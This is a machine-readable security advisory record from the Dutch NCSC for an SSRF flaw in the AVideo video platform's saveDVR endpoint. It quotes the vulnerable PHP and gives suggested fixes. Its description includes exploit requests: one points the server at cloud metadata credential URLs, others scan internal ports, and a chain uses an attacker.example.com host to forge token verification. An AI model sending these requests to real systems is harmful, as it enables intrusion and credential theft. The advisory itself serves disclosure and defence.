{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33351", "tracking": { "current_release_date": "2026-03-26T00:48:02.920359Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33351", "initial_release_date": "2026-03-21T01:08:19.462578Z", "revision_history": [ { "date": "2026-03-21T01:08:19.462578Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-21T01:08:22.304159Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-23T17:30:22.374601Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-23T17:30:25.143682Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-23T18:12:43.301757Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-23T18:12:45.962028Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-24T02:21:07.803285Z", "number": "7", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-24T02:21:12.771567Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-24T14:25:35.648445Z", "number": "9", "summary": "Unknown change." }, { "date": "2026-03-24T21:37:35.093796Z", "number": "10", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-24T21:37:36.907416Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-25T20:10:39.367035Z", "number": "12", "summary": "References created (2)." }, { "date": "2026-03-25T20:10:45.266432Z", "number": "13", "summary": "NCSC Score updated." }, { "date": "2026-03-26T00:46:48.893477Z", "number": "14", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (18).| Product Identifiers created (17).| References created (3).| CWES updated (1)." } ], "status": "interim", "version": "14" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<26.0", "product": { "name": "vers:unknown/<26.0", "product_id": "CSAFPID-5874460", "product_identification_helper": { "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "AVideo" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/10.4", "product": { "name": "vers:unknown/10.4", "product_id": "CSAFPID-5656122", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.4" } } }, { "category": "product_version_range", "name": "vers:unknown/10.8", "product": { "name": "vers:unknown/10.8", "product_id": "CSAFPID-5656123", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.8" } } }, { "category": "product_version_range", "name": "vers:unknown/11", "product": { "name": "vers:unknown/11", "product_id": "CSAFPID-5656124", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1", "product": { "name": "vers:unknown/11.1", "product_id": "CSAFPID-5656125", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1.1", "product": { "name": "vers:unknown/11.1.1", "product_id": "CSAFPID-5656126", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.5", "product": { "name": "vers:unknown/11.5", "product_id": "CSAFPID-5656127", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.5" } } }, { "category": "product_version_range", "name": "vers:unknown/11.6", "product": { "name": "vers:unknown/11.6", "product_id": "CSAFPID-5656128", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.6" } } }, { "category": "product_version_range", "name": "vers:unknown/12.4", "product": { "name": "vers:unknown/12.4", "product_id": "CSAFPID-5656129", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@12.4" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3", "product": { "name": "vers:unknown/14.3", "product_id": "CSAFPID-5656130", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3.1", "product": { "name": "vers:unknown/14.3.1", "product_id": "CSAFPID-5656131", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3.1" } } }, { "category": "product_version_range", "name": "vers:unknown/14.4", "product": { "name": "vers:unknown/14.4", "product_id": "CSAFPID-5656132", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.4" } } }, { "category": "product_version_range", "name": "vers:unknown/18.0", "product": { "name": "vers:unknown/18.0", "product_id": "CSAFPID-5656133", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@18.0" } } }, { "category": "product_version_range", "name": "vers:unknown/21.0", "product": { "name": "vers:unknown/21.0", "product_id": "CSAFPID-5721197", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@21.0" } } }, { "category": "product_version_range", "name": "vers:unknown/22.0", "product": { "name": "vers:unknown/22.0", "product_id": "CSAFPID-5772271", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@22.0" } } }, { "category": "product_version_range", "name": "vers:unknown/24.0", "product": { "name": "vers:unknown/24.0", "product_id": "CSAFPID-5772272", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@24.0" } } }, { "category": "product_version_range", "name": "vers:unknown/25.0", "product": { "name": "vers:unknown/25.0", "product_id": "CSAFPID-5840723", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@25.0" } } }, { "category": "product_version_range", "name": "vers:unknown/26.0", "product": { "name": "vers:unknown/26.0", "product_id": "CSAFPID-5878928", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@26.0" } } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<=26.0", "product": { "name": "vers:unknown/>=0|<=26.0", "product_id": "CSAFPID-5878929" } } ], "category": "product_name", "name": "avideo" } ], "category": "vendor", "name": "WWBN" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33351", "cwe": { "id": "CWE-918", "name": "Server-Side Request Forgery (SSRF)" }, "notes": [ { "category": "description", "text": "### Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability exists in `plugin/Live/standAloneFiles/saveDVR.json.php`. When the AVideo Live plugin is deployed in standalone mode (the intended configuration for this file), the `$_REQUEST['webSiteRootURL']` parameter is used directly to construct a URL that is fetched server-side via `file_get_contents()`. No authentication, origin validation, or URL allowlisting is performed.\n\n### Affected Component\n\n**File:** `plugin/Live/standAloneFiles/saveDVR.json.php`, lines 5-28\n\n```php\n$streamerURL = \"\"; // change it to your streamer URL\n\n$configFile = '../../../videos/configuration.php';\nif (file_exists($configFile)) {\n include_once $configFile;\n $streamerURL = $global['webSiteRootURL'];\n}\n\nif (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {\n $streamerURL = $_REQUEST['webSiteRootURL']; // ATTACKER-CONTROLLED\n}\n\n// ...\n\n$verifyURL = \"{$streamerURL}plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php?saveDVR={$_REQUEST['saveDVR']}\";\n$result = file_get_contents($verifyURL); // SSRF\n```\n\n### Root Cause\n\n1. **User-controlled URL base:** When the configuration file does not exist (standalone deployment), `$streamerURL` is set directly from `$_REQUEST['webSiteRootURL']` with no validation.\n2. **No URL allowlisting or scheme restriction:** The value is used as-is in a `file_get_contents()` call. There is no check for `http`/`https` scheme only, no private IP blocking, and no domain allowlist.\n3. **Verification bypass by design:** The token verification URL is constructed using the attacker-controlled base URL. The attacker can point it to their own server, which returns a JSON response that passes all validation checks, effectively bypassing authentication.\n\n### Exploitation\n\n#### Part 1: Basic SSRF (Internal Network Access)\n\n```\nPOST /plugin/Live/standAloneFiles/saveDVR.json.php\nContent-Type: application/x-www-form-urlencoded\n\nwebSiteRootURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/&saveDVR=anything\n```\n\nThe server fetches:\n```\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php?saveDVR=anything\n```\n\nWhile the appended path may cause a 404 on the metadata service, the attacker can also use this for:\n- **Internal port scanning:** `webSiteRootURL=http://192.168.1.X:PORT/` — differentiate open/closed ports by response time and error messages.\n- **Internal service access:** `webSiteRootURL=http://internal-service/` — reach services behind the firewall.\n- **Cloud metadata access:** With URL path manipulation or by hosting a redirect on the attacker server.\n\n#### Part 2: Verification Bypass + Downstream Command Execution Chain\n\nThis is the more severe attack chain:\n\n1. The attacker sets up a server at `https://attacker.example.com/` with the path:\n ```\n /plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php\n ```\n That returns:\n ```json\n {\"error\": false, \"response\": {\"key\": \"attacker_controlled_value\"}}\n ```\n\n2. The attacker sends:\n ```\n POST /plugin/Live/standAloneFiles/saveDVR.json.php\n\n webSiteRootURL=https://attacker.example.com/&saveDVR=anything\n ```\n\n3. The server fetches the verification URL from the attacker's server, receives the forged valid response, and proceeds to process it.\n\n4. The `key` value from the response flows into shell commands:\n - **Line 55:** `$DVRFile = \"{$hls_path}{$key}\";` — used in `exec()` at line 80 (though `escapeshellarg()` is applied to the path components)\n - **Line 72:** `$DVRFileTarget = \"{$tmpDVRDir}\" . DIRECTORY_SEPARATOR . \"{$key}.m3u8\";` — used **without** `escapeshellarg()` in:\n - Line 119: `exec(\"echo \\\"{$endLine}\\\" >> {$DVRFileTarget}\");`\n - Line 157: `exec(\"ffmpeg -i {$DVRFileTarget} -c copy -bsf:a aac_adtstoasc {$filename} -y\");`\n - Line 167: `exec(\"rm -R {$tmpDVRDir}\");`\n\n The `$key` is sanitized at line 47 with `preg_replace(\"/[^0-9a-z_:-]/i\", \"\", $key)`, which limits characters to alphanumerics, underscores, colons, and hyphens. This blocks most command injection payloads. However:\n - The SSRF itself (Part 1) is independently exploitable regardless of the downstream chain.\n - The verification bypass grants the attacker control over the processing flow even if direct OS command injection is constrained by the regex.\n - The colon character (`:`) is allowed by the regex and has special meaning in some shell contexts and FFmpeg input specifiers.\n\n### Impact\n\n- **SSRF:** The server can be used as a proxy to scan and access internal network resources, cloud metadata endpoints, and other services not intended to be publicly accessible.\n- **Authentication Bypass:** The DVR token verification is completely bypassed by redirecting the check to an attacker-controlled server.\n- **Potential Command Execution:** While the regex on `$key` limits direct shell injection, the attacker gains control over file paths and FFmpeg input specifiers, which could be leveraged for further exploitation depending on the environment.\n- **Information Disclosure:** Error messages at lines 31-32 reflect the fetched URL and its content, potentially leaking information about internal infrastructure.\n\n### Suggested Fix\n\n1. **Remove the user-controlled `webSiteRootURL` fallback entirely.** Require `$streamerURL` to be configured in the file or via the configuration file. If a fallback is necessary, validate it against a strict allowlist:\n\n ```php\n // Remove this block:\n // if (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {\n // $streamerURL = $_REQUEST['webSiteRootURL'];\n // }\n\n // If $streamerURL is still empty, abort:\n if (empty($streamerURL)) {\n error_log(\"saveDVR: streamerURL is not configured\");\n die('saveDVR: Server not configured');\n }\n ```\n\n2. **If the parameter must remain for backward compatibility**, validate it:\n ```php\n if (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {\n $url = filter_var($_REQUEST['webSiteRootURL'], FILTER_VALIDATE_URL);\n if ($url && preg_match('/^https?:\\/\\//i', $url)) {\n // Resolve hostname and block private/reserved IPs\n $host = parse_url($url, PHP_URL_HOST);\n $ip = gethostbyname($host);\n if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {\n die('saveDVR: Invalid URL');\n }\n $streamerURL = $url;\n }\n }\n ```\n\n3. **Apply `escapeshellarg()` to all variables used in `exec()` calls**, including `$DVRFileTarget` at lines 119, 157, and `$tmpDVRDir` at line 167.", "title": "github - https://api.github.com/advisories/GHSA-5f7v-4f6g-74rj" }, { "category": "description", "text": "WWBN AVideo is an open source video platform. Prior to version 26.0, a Server-Side Request Forgery (SSRF) vulnerability exists in `plugin/Live/standAloneFiles/saveDVR.json.php`. When the AVideo Live plugin is deployed in standalone mode (the intended configuration for this file), the `$_REQUEST['webSiteRootURL']` parameter is used directly to construct a URL that is fetched server-side via `file_get_contents()`. No authentication, origin validation, or URL allowlisting is performed. Version 26.0 contains a patch for the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33351" }, { "category": "description", "text": "WWBN AVideo is an open source video platform. Prior to version 26.0, a Server-Side Request Forgery (SSRF) vulnerability exists in `plugin/Live/standAloneFiles/saveDVR.json.php`. When the AVideo Live plugin is deployed in standalone mode (the intended configuration for this file), the `$_REQUEST['webSiteRootURL']` parameter is used directly to construct a URL that is fetched server-side via `file_get_contents()`. No authentication, origin validation, or URL allowlisting is performed. Version 26.0 contains a patch for the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33351.json" }, { "category": "description", "text": "### Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability exists in `plugin/Live/standAloneFiles/saveDVR.json.php`. When the AVideo Live plugin is deployed in standalone mode (the intended configuration for this file), the `$_REQUEST['webSiteRootURL']` parameter is used directly to construct a URL that is fetched server-side via `file_get_contents()`. No authentication, origin validation, or URL allowlisting is performed.\n\n### Affected Component\n\n**File:** `plugin/Live/standAloneFiles/saveDVR.json.php`, lines 5-28\n\n```php\n$streamerURL = \"\"; // change it to your streamer URL\n\n$configFile = '../../../videos/configuration.php';\nif (file_exists($configFile)) {\n include_once $configFile;\n $streamerURL = $global['webSiteRootURL'];\n}\n\nif (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {\n $streamerURL = $_REQUEST['webSiteRootURL']; // ATTACKER-CONTROLLED\n}\n\n// ...\n\n$verifyURL = \"{$streamerURL}plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php?saveDVR={$_REQUEST['saveDVR']}\";\n$result = file_get_contents($verifyURL); // SSRF\n```\n\n### Root Cause\n\n1. **User-controlled URL base:** When the configuration file does not exist (standalone deployment), `$streamerURL` is set directly from `$_REQUEST['webSiteRootURL']` with no validation.\n2. **No URL allowlisting or scheme restriction:** The value is used as-is in a `file_get_contents()` call. There is no check for `http`/`https` scheme only, no private IP blocking, and no domain allowlist.\n3. **Verification bypass by design:** The token verification URL is constructed using the attacker-controlled base URL. The attacker can point it to their own server, which returns a JSON response that passes all validation checks, effectively bypassing authentication.\n\n### Exploitation\n\n#### Part 1: Basic SSRF (Internal Network Access)\n\n```\nPOST /plugin/Live/standAloneFiles/saveDVR.json.php\nContent-Type: application/x-www-form-urlencoded\n\nwebSiteRootURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/&saveDVR=anything\n```\n\nThe server fetches:\n```\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php?saveDVR=anything\n```\n\nWhile the appended path may cause a 404 on the metadata service, the attacker can also use this for:\n- **Internal port scanning:** `webSiteRootURL=http://192.168.1.X:PORT/` — differentiate open/closed ports by response time and error messages.\n- **Internal service access:** `webSiteRootURL=http://internal-service/` — reach services behind the firewall.\n- **Cloud metadata access:** With URL path manipulation or by hosting a redirect on the attacker server.\n\n#### Part 2: Verification Bypass + Downstream Command Execution Chain\n\nThis is the more severe attack chain:\n\n1. The attacker sets up a server at `https://attacker.example.com/` with the path:\n ```\n /plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php\n ```\n That returns:\n ```json\n {\"error\": false, \"response\": {\"key\": \"attacker_controlled_value\"}}\n ```\n\n2. The attacker sends:\n ```\n POST /plugin/Live/standAloneFiles/saveDVR.json.php\n\n webSiteRootURL=https://attacker.example.com/&saveDVR=anything\n ```\n\n3. The server fetches the verification URL from the attacker's server, receives the forged valid response, and proceeds to process it.\n\n4. The `key` value from the response flows into shell commands:\n - **Line 55:** `$DVRFile = \"{$hls_path}{$key}\";` — used in `exec()` at line 80 (though `escapeshellarg()` is applied to the path components)\n - **Line 72:** `$DVRFileTarget = \"{$tmpDVRDir}\" . DIRECTORY_SEPARATOR . \"{$key}.m3u8\";` — used **without** `escapeshellarg()` in:\n - Line 119: `exec(\"echo \\\"{$endLine}\\\" >> {$DVRFileTarget}\");`\n - Line 157: `exec(\"ffmpeg -i {$DVRFileTarget} -c copy -bsf:a aac_adtstoasc {$filename} -y\");`\n - Line 167: `exec(\"rm -R {$tmpDVRDir}\");`\n\n The `$key` is sanitized at line 47 with `preg_replace(\"/[^0-9a-z_:-]/i\", \"\", $key)`, which limits characters to alphanumerics, underscores, colons, and hyphens. This blocks most command injection payloads. However:\n - The SSRF itself (Part 1) is independently exploitable regardless of the downstream chain.\n - The verification bypass grants the attacker control over the processing flow even if direct OS command injection is constrained by the regex.\n - The colon character (`:`) is allowed by the regex and has special meaning in some shell contexts and FFmpeg input specifiers.\n\n### Impact\n\n- **SSRF:** The server can be used as a proxy to scan and access internal network resources, cloud metadata endpoints, and other services not intended to be publicly accessible.\n- **Authentication Bypass:** The DVR token verification is completely bypassed by redirecting the check to an attacker-controlled server.\n- **Potential Command Execution:** While the regex on `$key` limits direct shell injection, the attacker gains control over file paths and FFmpeg input specifiers, which could be leveraged for further exploitation depending on the environment.\n- **Information Disclosure:** Error messages at lines 31-32 reflect the fetched URL and its content, potentially leaking information about internal infrastructure.\n\n### Suggested Fix\n\n1. **Remove the user-controlled `webSiteRootURL` fallback entirely.** Require `$streamerURL` to be configured in the file or via the configuration file. If a fallback is necessary, validate it against a strict allowlist:\n\n ```php\n // Remove this block:\n // if (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {\n // $streamerURL = $_REQUEST['webSiteRootURL'];\n // }\n\n // If $streamerURL is still empty, abort:\n if (empty($streamerURL)) {\n error_log(\"saveDVR: streamerURL is not configured\");\n die('saveDVR: Server not configured');\n }\n ```\n\n2. **If the parameter must remain for backward compatibility**, validate it:\n ```php\n if (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {\n $url = filter_var($_REQUEST['webSiteRootURL'], FILTER_VALIDATE_URL);\n if ($url && preg_match('/^https?:\\/\\//i', $url)) {\n // Resolve hostname and block private/reserved IPs\n $host = parse_url($url, PHP_URL_HOST);\n $ip = gethostbyname($host);\n if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {\n die('saveDVR: Invalid URL');\n }\n $streamerURL = $url;\n }\n }\n ```\n\n3. **Apply `escapeshellarg()` to all variables used in `exec()` calls**, including `$DVRFileTarget` at lines 119, 157, and `$tmpDVRDir` at line 167.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-5f7v-4f6g-74rj.json?alt=media" }, { "category": "other", "text": "0.00069", "title": "EPSS" }, { "category": "other", "text": "3.5", "title": "NCSC Score" }, { "category": "other", "text": "Is related to (a version of) an uncommon product, The value of the most recent EPSS score, There is exploit data available from source Nvd", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5874460", "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5878928", "CSAFPID-5878929" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-5f7v-4f6g-74rj" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33351" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33351.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-5f7v-4f6g-74rj.json?alt=media" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-5f7v-4f6g-74rj" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-5f7v-4f6g-74rj" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/commit/d0c54960389eeb85e76caed5a257ae90e6a739f2" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33351" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL" }, "products": [ "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5874460", "CSAFPID-5878928", "CSAFPID-5878929" ] } ], "title": "CVE-2026-33351" } ] }